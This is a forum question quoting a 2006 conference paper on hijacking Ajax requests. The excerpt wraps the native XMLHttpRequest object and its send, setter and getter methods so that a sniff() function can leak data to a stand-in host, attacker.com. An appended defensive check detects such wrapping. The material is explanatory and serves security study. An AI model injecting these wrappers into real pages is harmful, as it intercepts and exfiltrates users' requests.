http://events.ccc.de/congress/2006/F...rting_Ajax.pdf
The most important concept could be explained by looking at the following code:
    var xmlreqc=XMLHttpRequest;
    XMLHttpRequest = function() {
        this.xml = new xmlreqc();
        return this;
    }
In this example, the reference to XMLHttpRequest native object is saved in a new variable and XMLHttpRequest is readdressed to a new object by using one of the many ways of creating a constructor. Inside the constructor, a new attribute is instantiated as the previously saved real XMLHttpRequest. From now on, every cloned object will be a wrapper clone and not a clone of the original one.
What follows is the implementation of wrapper methods for some of XMLHttpRequest native objects, in order to create a Man in the middle attack (ref. Figure 2).
Before we go deep into hijacking, let's suppose there is a 'sniff()' function using the techniques described by Rager[13] and Grossman[6]:
    function sniff(){
        var data='';
        for(var i=0; i<arguments.length; i++)
            data+=arguments[i];
        if(image==null)
            image = document.createElement('img');
        if(data.length> 1024)
            data= data.substring(0, 1024) ;
        image.src=
            'http://www.attacker.com/hijacked.html?data='+data;
    }
Let's now show some examples that wrap native methods and intercept them.
    XMLHttpRequest.prototype.send = function (pay){
        // Hijacked .send
        sniff("Hijacked: "+" "+pay);
        pay=HijackRequest(pay);
        return this.xml.send(pay);
    }
The next code example could allow an attacker to modify any native attribute values or application behaviour, by using defineSetter and defineGetter methods[14]:
    XMLHttpRequest.prototype.__defineSetter__(
        "multipart",function (h){ // Hijacked multipart
            this.xml.multipart=h
            sniff("multipart: "+" "+h);
            return h;
        });
    XMLHttpRequest.prototype.__defineGetter__(
        "status",function (){ // Hijacked status
            h=this.xml.status ;
            sniff("status: "+" "+h);
            return h;
        });
I can't understand how the bold code can be used for an attack, especially the first bold part.

Please guide. Thanks in advance.
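
An added example, not part of the post or the quoted paper: a defender-side tripwire that reports when a built-in constructor, or a method or accessor on its prototype, has been replaced by script-defined code, which is the condition the wrapper quoted above creates. The names `isNative`, `auditBuiltin` and `tamperedSample` are hypothetical, and `Map` stands in for a native constructor so the constructed sample runs outside a browser.

```javascript
// Added example (not from the quoted paper). Reports built-ins whose constructor
// or prototype members are no longer native code.
const fnToString = Function.prototype.toString; // captured early, before other scripts
const NATIVE_RE = /\{\s*\[native code\]\s*\}\s*$/;

function isNative(fn) {
  return typeof fn === 'function' && NATIVE_RE.test(fnToString.call(fn));
}

// scope: object that holds the constructor (window in a browser).
// methods / accessors: prototype members to verify, e.g. 'send' and 'status'.
function auditBuiltin(scope, name, methods, accessors) {
  const findings = [];
  const ctor = scope[name];
  if (!isNative(ctor)) findings.push(name + ': constructor is not native');
  const proto = ctor && ctor.prototype;
  if (!proto) return findings;
  for (const m of methods) {
    const d = Object.getOwnPropertyDescriptor(proto, m);
    if (d && !isNative(d.value)) findings.push(name + '.prototype.' + m + ': method replaced');
  }
  for (const a of accessors) {
    const d = Object.getOwnPropertyDescriptor(proto, a);
    if (!d) continue;
    if (d.get && !isNative(d.get)) findings.push(name + '.prototype.' + a + ': getter replaced');
    if (d.set && !isNative(d.set)) findings.push(name + '.prototype.' + a + ': setter replaced');
  }
  return findings;
}

// Constructed sample: Map stands in for a native constructor, wrapped the same
// way the post wraps XMLHttpRequest (saved reference, new constructor, new members).
function tamperedSample() {
  const saved = Map;
  const scope = { Builtin: function () { this.xml = new saved(); return this; } };
  scope.Builtin.prototype.set = function (k, v) { return this.xml.set(k, v); };
  Object.defineProperty(scope.Builtin.prototype, 'size', {
    get: function () { return this.xml.size; }
  });
  return scope;
}

console.log(auditBuiltin({ Builtin: Map }, 'Builtin', ['set'], ['size'])); // untouched
console.log(auditBuiltin(tamperedSample(), 'Builtin', ['set'], ['size'])); // wrapped
// In a browser: auditBuiltin(window, 'XMLHttpRequest', ['open', 'send'], ['status'])
```

The check shares the page with whatever script did the wrapping, so a clean result is a tripwire reading and not proof; keeping untrusted script out of the page is the actual fix.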